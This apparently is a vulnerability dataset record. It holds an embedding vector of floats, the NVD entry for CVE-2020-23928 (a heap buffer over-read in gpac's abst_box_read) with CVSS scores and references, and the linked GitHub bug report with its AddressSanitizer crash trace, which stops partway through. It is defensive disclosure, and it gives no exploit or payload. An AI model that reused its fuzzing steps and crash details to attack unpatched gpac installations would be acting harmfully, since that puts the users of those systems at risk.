0.04329562559723854, 0.009605851955711842, 0.02376299723982811, 0.01686312071979046, 0.017694607377052307, -0.017971768975257874, -0.006655535195022821, 0.0015763590345159173, -0.008336741477251053, -0.006950931623578072, 0.003564814105629921, 0.004496589303016663, 0.0040407306514680386, -0.0003195568569935858, 0.014375956729054451, 0.015083448961377144, 0.03416386619210243, -0.01927005499601364, -0.006134033203125, 0.0007849884568713605, -0.004846688359975815, -0.00027465479797683656, 0.0018909013597294688, 0.0012681985972449183, 0.006754000671207905, 0.014273843728005886, -0.005791227333247662, 0.013580938801169395, 0.0016100924694910645, 0.00128825637511909, -0.008329448290169239, -0.010327932424843311, 0.018642792478203773, -0.007636542897671461, -0.020320352166891098, 0.006677416618913412, 0.010904137045145035, 0.016717245802283287, -0.01007994543761015, -0.004026142880320549, -0.023835932835936546, 0.010831199586391449, 0.026096992194652557, 0.003256653668358922, -0.023777583613991737, 0.0032183616422116756, 0.010116414166986942, 0.007417730987071991, -0.00623614527285099, -0.0016565901460126042, 0.0059152208268642426, -0.012129485607147217, 0.003821918275207281, -0.0059042805805802345, 0.01270569022744894, -0.014463481493294239, 0.000695184338837862, -0.01423008181154728, -0.01804470643401146, -0.007184331305325031, 0.0005114733357913792, -0.005667233839631081, 0.00034326151944696903, 0.010473807342350483, -0.00868684146553278, -0.04317892715334892, 0.0030998382717370987, 0.008635785430669785, -0.01157516147941351, 0.006743060424923897, 0.015564835630357265, 0.016527608036994934, -0.0053244284354150295, -0.003807330969721079, -0.018030118197202682, 0.004365301690995693, 0.004850335419178009, 0.01247229054570198, 0.015185561031103134, 0.0004273674276191741, -0.015696123242378235, -0.020699625834822655, 0.0008009435259737074, 0.014303019270300865, 0.007505255751311779, -0.02221672423183918, 0.0052806660532951355, -0.006356492172926664, 0.025455143302679062, 0.012756746262311935, 0.019547216594219208, -0.004438239149749279, -0.003101661801338196, 0.021560287103056908, -0.00912446528673172, -0.003982380498200655, -0.03238419443368912, -0.012968265451490879, 0.0033660598564893007, -0.009314103052020073, 0.012224303558468819, 0.000775415450334549, 0.00762924924492836, -0.007432318292558193, 0.007651130668818951, -0.005710996221750975, -0.03390129283070564, -0.005444774869829416, 0.005601590499281883, -0.0017824070528149605, -0.00751254940405488, -0.013347539119422436, 0.0005898810341022909, -0.008365917019546032, -0.0007954732282087207, 0.008205454796552658, 0.011706448160111904, 0.006896228529512882, -0.010663444176316261, 0.026520028710365295, -0.0049560945481061935, 0.018482331186532974, 0.011553280055522919, 0.027949601411819458, -0.005772992968559265, -0.0004663433355744928, 0.00048184252227656543, 0.00945997703820467, -0.0013630171306431293, -0.01829269342124462, -0.00026895655901171267, 0.0070639848709106445, 0.011706448160111904, -0.012297241017222404, -0.009117172099649906, -0.025542668998241425, 0.017140282317996025, 0.02128312550485134, 0.008759778924286366, -0.0020258354488760233, -0.0041647241450846195, -0.014171731658279896, 0.041632652282714844, 0.002126124454662204, -0.015710709616541862, -0.00948185846209526, -0.009489152580499649, 0.0006495984853245318, 0.012552522122859955, -0.0063200234435498714, -0.0023941693361848593, 0.03536003828048706, -0.009722552262246609, 0.006334610749036074, -0.0032985927537083626, -0.025630192831158638, -0.004832101054489613, -0.02226048707962036, -0.017490381374955177, 0.023792171850800514, 0.011473048478364944, 0.021020550280809402, -0.02360253408551216, 0.01918252930045128, -0.004452826455235481, -0.020597513765096664, -0.013114139437675476, 0.010196644812822342, 0.00664824154227972, 0.007370321545749903, 0.01340588927268982, -0.01342777069658041, 0.0021826508454978466, 0.0007808857480995357, 0.0039641461335122585, 0.012494171969592571, 0.014966748654842377, -0.013478826731443405, 0.01948886550962925, -0.026797190308570862, 0.003442644141614437, -0.005043619312345982, -0.02567395567893982, -0.01332565862685442, 0.012355591170489788, -0.01680477149784565, 0.010933312587440014, -0.008672254160046577, 0.009744432754814625, -0.01778213120996952, 0.022464711219072342, 0.019576391205191612, -0.004733635578304529, -0.006961872335523367, -0.0008597492706030607, -0.01763625629246235, -0.0013311071088537574, 0.006309082731604576, -0.006454957649111748, -0.008344035595655441, 0.022041674703359604, -0.03037112206220627, 0.01877407915890217, 0.023806758224964142, -0.008650372736155987, 0.0057839336805045605, 0.029656335711479187, -0.0011979963164776564, 0.003938618116080761, -0.010736381635069847, -0.027905838564038277, -0.00012285388947930187, 0.00969337671995163, -0.00794287957251072, -0.00751254940405488, -0.0053681908175349236, 0.010991661809384823, -0.025119630619883537, -0.024565307423472404, -0.012107604183256626, 0.030604522675275803, 0.03031277284026146, 0.010590506717562675, -0.0228439848870039, 0.023850521072745323, 0.003710688790306449, 0.007446906063705683, -0.019445104524493217, -0.009109877981245518, -0.018030118197202682, -0.013879981823265553, 0.011721036396920681, 0.025134218856692314, 0.0015417137183248997, -0.01922629214823246, 0.005353603046387434, -0.013384007848799229, -0.006976459641009569, 0.009241165593266487, -0.001482452149502933, -0.0064075482077896595, 0.0005588826024904847, 0.0022574118338525295, -0.0007371233077719808, -0.015287673100829124, 0.016994407400488853, 0.023019034415483475, 0.007147862575948238, -0.016177508980035782, 0.009773608297109604, -0.0014988629845902324, -0.01582740992307663, -0.019313815981149673, -0.013544470071792603, -0.017023583874106407, -0.006433076225221157, 0.009576677344739437, -0.01216595433652401, -0.0070749251171946526, -0.0027515625115484, 0.0027898545376956463, 0.006155914161354303, 0.00796476099640131, 0.0004542630922514945, -0.0007717685657553375, 0.013712226413190365, 0.030633697286248207, -0.01804470643401146, -0.004558586049824953, 0.012355591170489788, -0.0006149532273411751, -0.00463881716132164, -0.008438854478299618, -0.00015499192522838712, -0.00786264892667532, -0.0039057964459061623, -0.01578364707529545, 0.010823906399309635, 0.0023814053274691105, 0.007366674952208996, -0.011859617196023464, -0.0035101110115647316, 0.009955951943993568, -0.014237374998629093, -0.005444774869829416, 0.006637300830334425, 0.0038839152548462152, 0.0003886194317601621, -0.006549776066094637, 0.0008474410860799253, -0.007352087181061506, 0.008249216713011265, 0.01061968132853508, 0.008701428771018982, -0.04189522936940193, 0.012158660218119621, -0.023383721709251404, 0.008183573372662067, 0.010058064013719559, -0.01007994543761015, -0.006349198520183563, 0.008694134652614594, -0.007665717974305153, 0.001870843581855297, 0.0031308368779718876, -0.015856584534049034, 0.019109591841697693, 0.020597513765096664, -0.0021078900899738073, -0.004595054779201746, 0.024317320436239243, -0.007636542897671461, 0.03177151829004288, 0.015521072782576084, -0.02427355758845806, 0.016556784510612488, -0.003353295847773552, 0.014631236903369427, -0.0016885001678019762, 0.020174477249383926, -0.015521072782576084, 0.0004342053143773228, 0.015346023254096508, 0.006225205026566982, -0.004952447488903999, 0.018336456269025803, -0.0018726671114563942, -0.018030118197202682, 0.012304535135626793, -0.0061522675678133965, 0.015579422935843468, 0.012056548148393631, 0.0022118259221315384, 0.04632981866598129, 0.01020393893122673, 0.007053044158965349, -0.0003744878340512514, -0.003453584620729089, 0.03098379634320736, 0.0035976360086351633, 0.006852466147392988, -0.006848819553852081, 0.006837878841906786, -0.004605995025485754, 0.014937574043869972, 0.01097707450389862, -0.0025363971944898367, -0.0026275687851011753, -0.009197402745485306, -0.02050998993217945, 0.0396779328584671, -0.018540680408477783, -0.012041960842907429, -0.006265320349484682, -0.02506128139793873, -0.002171710366383195, -0.0011633511167019606, -0.023223260417580605, 0.007286443840712309, -0.02005777694284916, 0.008037698455154896, 0.001599151873961091, -0.01549189817160368, -0.013719519600272179, -0.017709193751215935, -0.0006979195168241858, -0.012056548148393631, 0.0017295274883508682, 0.010393575765192509, -0.002921141916885972, 0.00010678487160475925, -0.01342777069658041, -0.0009117171866819263, -0.023690059781074524, 0.005517712328583002, -0.0014760701451450586, 0.00870872288942337, 0.032909344881772995, -0.02144358865916729, 0.007541724480688572, 0.020218240097165108, -0.024609070271253586, 0.011086480692029, -0.004977975971996784, -0.014638531021773815, 0.011721036396920681, 0.014091501012444496, -0.0052369036711752415, -0.003433526959270239, 0.007760536391288042, 0.0025619252119213343, -0.003338708309456706, 0.013952919282019138, 0.0018188757821917534, 0.009015059098601341, 0.006298142019659281, -0.006247085984796286, -0.000011624393664533272, 0.008854596875607967, 0.007348440587520599, -0.018890779465436935, 0.02577606774866581, -0.014397837221622467, 0.031071322038769722, 0.010984368622303009, 0.0020221886225044727, -0.006746707018464804, 0.011735623702406883, 0.0020167184993624687, -0.011917966417968273, 0.016731834039092064, -0.022391773760318756, -0.007906411774456501, -0.009270340204238892, -0.0025418675504624844, 0.002554631559178233, 0.01865738071501255, 0.00220270873978734, -0.004478354938328266, -0.003161835251376033, 0.006130386143922806, 0.026782603934407234, 0.023587945848703384, -0.011502224020659924, 0.010524863377213478, 0.008110635913908482, 0.021487349644303322, 0.0041209617629647255, -0.0036979247815907, -0.013588232919573784, 0.01401856355369091, -0.00411002105101943, -0.005510418675839901, 0.010123707354068756, -0.008774366229772568, 0.017242394387722015, 0.03253006935119629, -0.03684796020388603, 0.018496917560696602, 0.0014177202247083187, -0.012041960842907429, -0.000902600004337728, -0.0038437996990978718, 0.032238319516181946, 0.004558586049824953, 0.021735336631536484, 0.009284927509725094, -0.0011788503034040332, -0.017869656905531883, -0.024258971214294434, 0.0173153318464756, -0.0003820094862021506, 0.012698397040367126, 0.005944395903497934, -0.0416618287563324, 0.0021662400104105473, -0.003455408150330186, -0.002521809656172991, -0.0001692374935373664, 0.007505255751311779, 0.01559401024132967, 0.006378373131155968, 0.0012508759973570704, -0.010349812917411327, 0.005185847170650959, 0.008694134652614594, 0.018307281658053398, -0.0005825872649438679, -0.003508287714794278, 0.0025564548559486866, 0.013551764190196991, 0.011618923395872116, 0.006480485666543245, 0.01896371692419052, -0.0005251491093076766, -0.013989388011395931, -0.006403901614248753, -0.0263887420296669, -0.004897744860500097, 0.024040158838033676, 0.0007968408172018826, -0.02370464615523815, -0.0022647054865956306, 0.023879695683717728, 0.020918438211083412, 0.00774594908580184, -0.006134033203125, -0.012822390533983707, -0.011648098938167095, -0.013384007848799229, -0.013945626094937325, -0.018365630879998207, -0.010408163070678711, 0.005419246852397919, -0.0006518777809105814, -0.008796247653663158, -0.006633654236793518, -0.03830670937895775, 0.018642792478203773, -0.009751726873219013, -0.003222008468583226, -0.0011925260769203305, -0.0063637858256697655, -0.02134147472679615, 0.0104154571890831, 0.0016921471105888486, -0.001244493992999196, 0.01928464137017727, -0.011786679737269878, 0.028620624914765358, 0.013376714661717415, 0.005973570980131626, 0.018234344199299812, -0.003681513946503401, -0.010444631800055504, -0.021429000422358513, -0.012333709746599197, 0.012844271957874298, -0.003147247713059187, 0.02272728644311428, -0.014602062292397022, 0.019663916900753975, -0.0010083592496812344, 0.019313815981149673, -0.009109877981245518, -0.0006240704096853733, 0.024609070271253586, 0.0012581696501001716, 0.020553752779960632, 0.012640046887099743, -0.002897437196224928, 0.0000956163348746486, 0.0076875993981957436, 0.008570141158998013, -0.008519085124135017, 0.02026200294494629, 0.006247085984796286, 0.01578364707529545, -0.010101825930178165, 0.009700670838356018, 0.007753242738544941, -0.0007448729011230171, 0.01943051628768444, -0.0024689300917088985, -0.025221744552254677, 0.015302261337637901, 0.027614090591669083, -0.002302997512742877, 0.018584443256258965, -0.02665131725370884, -0.017446620389819145, -0.00012855212844442576, 0.005255137570202351, 0.0020294825080782175, 0.014412425458431244, -0.0036268108524382114, -0.012406647205352783, -0.004172017797827721, 0.0061960299499332905, 0.0018799607641994953, 0.005926161538809538, -0.016367146745324135, 0.011093774810433388, 0.01751955784857273, -0.0023795817978680134, 0.032238319516181946, 0.011772092431783676, -0.016775596886873245, 0.0012025549076497555, 0.004777397960424423, -0.00997053924947977, 0.0035757548175752163, -0.014419718645513058, -0.012144072912633419, 0.020247414708137512, 0.024550719186663628, 0.00981737021356821, 0.007326559163630009, -0.008985884487628937, -0.026213692501187325, -0.007804298773407936, -0.006163208279758692, 0.008942121639847755, 0.011217768304049969, -0.0016529432032257318, -0.012435821816325188, 0.011174005456268787, 0.01808846928179264, -0.016017047688364983, 0.011093774810433388, 0.005313487723469734, -0.010174763388931751, -0.0036359280347824097, -0.011604336090385914, 0.023894283920526505, 0.018496917560696602, -0.003096191445365548, 0.044666849076747894, 0.019095003604888916, -0.01943051628768444, 0.010021595284342766, -0.006918109953403473, 0.002315761521458626, -0.0034444674383848906, -0.015375198796391487, 0.007005634717643261, -0.000902600004337728, -0.017023583874106407, 0.014966748654842377, -0.004255895968526602, -0.006582598201930523, 0.0056599401868879795, 0.0030834274366497993, -0.008832716383039951, 0.0032821819186210632, 0.022406361997127533, -0.005517712328583002, 0.006258026696741581, -0.002244647592306137, -0.02809547632932663, 0.0059152208268642426, 0.0059152208268642426, 0.02457989566028118, -0.006823291536420584, -0.014397837221622467, 0.024258971214294434, 0.008402385748922825, 0.019824378192424774, 0.002948493231087923, 0.012319122441112995, -0.012195128947496414, 0.00959126465022564, -0.007541724480688572, 0.018263518810272217, -0.00046565954107791185, 0.0015325965359807014, -0.005050912965089083, -0.01247229054570198, 0.01695064641535282, -0.010364401154220104, -0.011370936408638954, -0.033697064965963364, 0.009700670838356018, 0.02077256329357624, -0.014915692619979382, 0.0013621054822579026, 0.003497347002848983, -0.011509517207741737, 0.006841525435447693, -0.0034517613239586353, -0.0011432933388277888, -0.009080703370273113, -0.011458461172878742, -0.00548853725194931, -0.0034827596973627806, -0.016425495967268944, 0.014208200387656689, 0.003156364895403385, 0.023106560111045837, 0.0035538736265152693, -0.004923272877931595, -0.0034590549767017365, -0.011494929902255535, 0.0049560945481061935, -0.016833946108818054, 0.001077649649232626, 0.027249403297901154, 0.003205597633495927, -0.008832716383039951, 0.0032876520417630672, -0.001555389491841197, 0.01835104264318943, -0.024186033755540848, -0.0014806287363171577, 0.009314103052020073, -0.011815854348242283, -0.01566694863140583, -0.006681063212454319, 0.014551006257534027, 0.013420476578176022, -0.022085437551140785, -0.005229609552770853, -0.01273486576974392, -0.001118676969781518, 0.025280093774199486, 0.011772092431783676, 0.012486878782510757, -0.021983323618769646, 0.025221744552254677, 0.009299514815211296, -0.02670966647565365, 0.01989731565117836, -0.015141799114644527, -0.0042121331207454205, -0.013267308473587036, -0.015710709616541862, 0.01201278530061245, -0.0006960960454307497, -0.004306952003389597, 0.02005777694284916, -0.0015754472697153687, -0.019459690898656845, -0.0016921471105888486, -0.024506958201527596, -0.002773443702608347, -0.010758263058960438, 0.0052004349417984486, -0.007680305279791355, 0.026111580431461334, -0.005098322406411171, -0.006553423125296831, -0.002859144937247038, 0.011706448160111904, -0.01018205750733614, -0.006061095744371414, 0.005459362640976906, 0.03413468971848488, -0.021005963906645775, 0.0020495401695370674, 0.01804470643401146, -0.03150894492864609, -0.0008725133375264704, -0.03530168905854225, -0.02514880709350109, 0.002193591557443142, -0.001332018757238984, -0.010867668315768242, -0.004482001531869173, -0.020597513765096664, 0.00809604860842228, 0.013398595154285431, 0.032296668738126755, -0.021151838824152946, -0.03506828844547272, -0.02457989566028118, 0.03515581414103508, 0.014857343398034573, -0.0061522675678133965, 0.006918109953403473, 0.015462723560631275, 0.00015316848293878138, 0.012282653711736202, -0.00318371644243598, -0.010291463695466518, -0.015637772157788277, -0.013201664201915264, -0.006983753759413958, -0.04382077232003212, 0.003982380498200655, 0.02242094837129116, 0.023806758224964142, 0.001026593497954309, -0.0037216295022517443, 0.015170973725616932, -0.008052285760641098, 0.013106846250593662, -0.011283411644399166, 0.011319880373775959, -0.0007863560458645225, -0.00945997703820467, -0.004186605103313923, 0.005685468204319477, -0.011385523714125156, -0.003821918275207281, -0.009642320685088634, -0.00642942963168025, 0.0220125000923872, 0.0010038006585091352, 0.006713885348290205, 0.007348440587520599, 0.013420476578176022, 0.018380219116806984, 0.0008565582684241235, -0.005539593752473593, 0.0064841327257454395, 0.015185561031103134, -0.009080703370273113, -0.0006746707367710769, -0.003475465811789036, -0.008745190687477589, 0.0029685511253774166, -0.007490668445825577, 0.029495874419808388, 0.010780143551528454, 0.013347539119422436, -0.00513114407658577, 0.0047883386723697186, -0.02417144551873207, 0.01871572993695736, 0.007651130668818951, -0.011786679737269878, -0.016979821026325226, 0.008161691948771477, 0.007446906063705683, 0.0053681908175349236, -0.02237718552350998, -0.03851093351840973, 0.012683809734880924, 0.0006974636344239116, 0.00961314607411623, 0.005353603046387434, 0.0066956509836018085, -0.015346023254096508, -0.01918252930045128, -0.010152882896363735, -0.00017995017697103322, 0.0270597655326128, -0.0017222337191924453, 0.014485361985862255, -0.0055724154226481915, 0.007169743999838829, 0.003821918275207281, 0.00017767088138498366, 0.01332565862685442, -0.006243439391255379, -0.002676801523193717, -0.013726813718676567, -0.0020367761608213186, -0.000495062442496419, -0.002552808029577136, 0.017388269305229187, -0.004252248909324408, 0.010918725281953812, 0.0041209617629647255, -0.009248458780348301, 0.0032110679894685745, 0.003975086845457554, 0.007497962098568678, 0.009160934016108513, 0.011648098938167095, 0.013252721168100834, 0.018219755962491035, 0.0013548117130994797, -0.010823906399309635, 0.0008141634170897305, -0.0073557342402637005, 0.014244669117033482, -0.01007994543761015, 0.017650844529271126, 0.009707964025437832, 0.00796476099640131, 0.002780737355351448, 0.017402857542037964, -0.008956709876656532, -0.011896085925400257, 0.017461206763982773, 0.0033988815266638994, 0.013012027367949486, 0.027395278215408325, 0.0008305743685923517, 0.010378988459706306, 0.019211703911423683, 0.010823906399309635, 0.0017723782220855355, 0.010758263058960438, -0.00031841720920056105, -0.02293151058256626, 0.0004091330920346081, -0.017256982624530792, 0.02077256329357624, -0.001856256159953773, -0.017855068668723106, -0.00631272979080677, -0.010167470201849937, -0.006134033203125, 0.047350943088531494, 0.014346781186759472, -0.019926490262150764, 0.00007595743954880163, 0.012953677214682102, -0.003763568587601185, -0.00878895353525877, 0.025528080761432648, -0.0031217196956276894, 0.030487822368741035, -0.0077678305096924305, 0.0000838209962239489, 0.006126739550381899, 0.0018115820130333304, 0.0019273700891062617, 0.004069905262440443, 0.02581983059644699, 0.004591407719999552, -0.0011241473257541656, 0.015170973725616932, 0.0010010654805228114, 0.007129628211259842, 0.017096521332859993, 0.017344508320093155, 0.002501751994714141, -0.00336241303011775, -0.007519843056797981, -0.009780901484191418, -0.03442643955349922, -0.01378516387194395, -0.0004763722245115787, 0.011531398631632328, -0.006845172494649887, -0.018336456269025803, 0.0010229466715827584, -0.0011359995696693659, -0.0066956509836018085, -0.009934070520102978, -0.007651130668818951, 0.022566823288798332, -0.02479870617389679, -0.007716774009168148, -0.010116414166986942, 0.008438854478299618, -0.0013730460777878761, -0.00927763432264328, 0.0032402428332716227, 0.0020167184993624687, -0.006411195266991854, 0.0064950729720294476, -0.012078428640961647, 0.009015059098601341, 0.0014277490554377437, -0.008205454796552658, -0.0019218998495489359, 0.016731834039092064, -0.009605851955711842, 0.0031198961660265923, 0.025951117277145386, 0.005419246852397919, 0.012676515616476536, 0.023106560111045837, -0.0007093159365467727, 0.008088754490017891, 0.024346495047211647, -0.02138523757457733, -0.021939562633633614, -0.0065753040835261345, 0.0061194454319775105, 0.01018205750733614, 0.0028883200138807297, -0.012669221498072147, 0.0034152925945818424, -0.005692761857062578, 0.005284312646836042, 0.010174763388931751, 0.0013693991350010037, 0.0010867668315768242, 0.0016383557813242078, 0.01319437101483345, 0.011035424657166004, -0.02278563566505909, 0.009335983544588089, 0.013588232919573784, 0.014777111820876598, 0.004945153836160898, -0.03320109099149704, -0.010473807342350483, -0.002917494857683778, 0.008314860984683037, 0.008329448290169239, -0.002033129334449768, -0.03127554431557655, 0.009875720366835594, 0.009190109558403492, -0.013559057377278805, -0.009802782908082008, -0.0015854762168601155, 0.032442543655633926, -0.01639632135629654, -0.003161835251376033, -0.0027697968762367964, 0.024915406480431557, 0.017242394387722015, -0.010707206092774868, 0.0258781798183918, 0.005229609552770853, 0.013048496097326279, 0.03217997029423714, -0.015068861655890942, 0.015112623572349548, 0.004409064073115587, -0.00039203837513923645, -0.01026228815317154, 0.002994079142808914, -0.02169157564640045, 0.008125223219394684, -0.033638715744018555, -0.0008428825531154871, -0.003154541365802288, 0.01576906070113182, 0.01906582899391651, -0.0016410909593105316, 0.011990903876721859, -0.02215837500989437, -0.005218669306486845, 0.016936058178544044, 0.002363170962780714, -0.014040444046258926, -0.00892024114727974, -0.0060282740741968155, 0.006834231782704592, 0.015477310866117477, -0.002919318387284875, 0.05161048471927643, 0.012844271957874298, 0.006538835354149342, -0.012085722759366035, -0.0025291035417467356, -0.0024251677095890045, -0.0047445762902498245, -0.016119159758090973, -0.016688071191310883, 0.005222315900027752, -0.014835461974143982, -0.0038839152548462152, -0.0071989186108112335, -0.00889106560498476, -0.011502224020659924, 0.00474092923104763, 0.010473807342350483, 0.002815382555127144, -0.025601018220186234, -0.015696123242378235, -0.00959126465022564, -0.008497203700244427, 0.007297384086996317, -0.009343277662992477, -0.006061095744371414, -0.005762052722275257, -0.007702186703681946, 0.01226806640625, 0.014966748654842377, -0.02628662995994091, 0.022348010912537575, -0.0033697066828608513, 0.01881784200668335, -0.0072426809929311275, 0.018949130550026894, 0.005229609552770853, -0.013566351495683193, 0.025907354429364204, 0.0027460921555757523, -0.016017047688364983, 0.004193899221718311, 0.0067321197129786015, -0.014602062292397022, -0.01327460166066885, 0.004350714385509491, 0.0015955050475895405, -0.0027315046172589064, -0.017038170248270035, 0.013792457059025764, -0.025849005207419395, -0.011866910383105278, 0.008723310194909573, -0.027614090591669083, -0.0031144258100539446, -0.0002345392422284931, 0.004697166848927736, -0.004627876449376345, 0.006188736297190189, -0.00902235321700573, 0.005678174551576376, -0.010940605774521828, -0.0001361877511953935, 0.002501751994714141, 0.004153783433139324, -0.010612388141453266, 0.016979821026325226, 0.004529410973191261, 0.0033824706915766, -0.025455143302679062, -0.005470302887260914, -0.00601733336225152, -0.00312536652199924, -0.0013493414735421538, 0.00393132446333766, -0.01020393893122673, -0.021779099479317665, 0.030837921425700188, -0.007826180197298527, 0.015433548018336296, 0.013821632601320744, -0.01763625629246235, -0.004948800895363092, 0.005911574233323336, -0.0031417773570865393, -0.0013019321486353874, -0.019255466759204865, -0.023310784250497818, 0.0166443083435297, -0.008023111149668694, 0.012362885288894176, 0.0017076462972909212, 0.01203466672450304, -0.029466699808835983, 0.016921469941735268, -0.014711468480527401, 0.005583356134593487, -0.004310598596930504, 0.01814681850373745, 0.0005283401114866138, 0.011524105444550514, -0.005287959706038237, 0.011225061491131783, -0.023646296933293343, -0.006593538448214531, -0.004905038513243198, -0.0007115952321328223, -0.006790469400584698, -0.010831199586391449, -0.00561982486397028, -0.005937102250754833, -0.004762810654938221, 0.01224618498235941, -0.023777583613991737, -0.006823291536420584, 0.0010876785963773727, 0.002244647592306137, -0.01538978610187769, 0.004398123826831579, 0.002273822668939829, -0.010678031481802464, -0.01654219627380371, 0.005732877645641565, 0.020495401695370674, 0.011334467679262161, 0.009306808933615685, -0.013544470071792603, 0.013311070390045643, 0.02701600268483162, 0.0010867668315768242, 0.017650844529271126, -0.00811793003231287, -0.015068861655890942, -0.002224589930847287, 0.007023869082331657, 0.012107604183256626, 0.019503453746438026, 0.015287673100829124, 0.009197402745485306, -0.0018644615774974227, -0.005218669306486845, -0.021574875339865685, 0.03824836015701294, 0.012574403546750546, 0.0023011742159724236, -0.01536061055958271, -0.0006851554499007761, -0.013077670708298683, -0.0166443083435297, -0.007760536391288042, -0.018015531823039055, 0.0017650844529271126, -0.005258784629404545, 0.002075068186968565, -0.012851565144956112, 0.00013744136958848685, 0.02412768267095089, 0.020451638847589493, 0.02433190867304802, -0.012727571651339531, 0.0019091357244178653, -0.003411645768210292, -0.012807803228497505, -0.01064156275242567, 0.020947614684700966, -0.009824664331972599, 0.021020550280809402, -0.003741687163710594, 0.006557069718837738, 0.006826938129961491, -0.00011806737165898085, -0.01784048229455948, -0.005867811851203442, -0.0018963717157021165, 0.0029357292223721743, 0.006768588442355394, 0.00021516525885090232, 0.0005862341495230794, 0.000362179649528116, 0.0228439848870039, 0.028926962986588478, 0.023850521072745323, -0.01943051628768444, -0.020626690238714218, 0.011327174492180347, 0.02557184360921383, 0.007643836550414562, -0.016002459451556206, -0.01975144073367119, 0.0008159868884831667, 0.00788453035056591, 0.009664202108979225, -0.03792743384838104, 0.021429000422358513, -0.002100596437230706, -0.001900018542073667, 0.020174477249383926, 0.013464239425957203, -0.00819816067814827, 0.02406933344900608, -0.009569383226335049, -0.018423980101943016, -0.011035424657166004, -0.01999942772090435, 0.016177508980035782 ]
CVE-2020-23928
2021-04-21T18:15:08.383000
An issue was discovered in gpac before 1.0.1. The abst_box_read function in box_code_adobe.c has a heap-based buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/126.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/8e05648d6b4459facbc783025c5c42d301fef5c3" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1568" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1569" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1569
[ "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==73339==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000e2d3 at pc 0x7f61cb5fc3d5 bp 0x7ffc8913b6b0 sp 0x7ffc8913ae58 READ of size 20 at 0x60300000e2d3 thread T0 #0 0x7f61cb5fc3d4 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x623d4) #1 0x56330736c407 in abst_box_read isomedia/box_code_adobe.c:141 #2 0x56330715bb64 in gf_isom_box_read isomedia/box_funcs.c:1681 #3 0x56330715bb64 in gf_isom_box_parse_ex isomedia/box_funcs.c:259 #4 0x56330715d041 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x5633071946f5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #6 0x56330719f951 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #7 0x56330719f951 in gf_isom_open_file isomedia/isom_intern.c:740 #8 0x563306ac97e3 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5331 #9 0x7f61ca5c6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x563306a9af09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) 0x60300000e2d3 is located 0 bytes to the right of 19-byte region [0x60300000e2c0,0x60300000e2d3) allocated by thread T0 here: #0 0x7f61cb632612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x56330736a3a9 in abst_box_read isomedia/box_code_adobe.c:97 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strdup Shadow bytes around the buggy address: 0x0c067fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9c50: fa fa fa fa fa fa fa fa 00 00[03]fa fa fa 00 00 0x0c067fff9c60: 04 fa fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 0x0c067fff9c70: 00 00 00 06 fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9c80: fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9c90: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9ca0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd 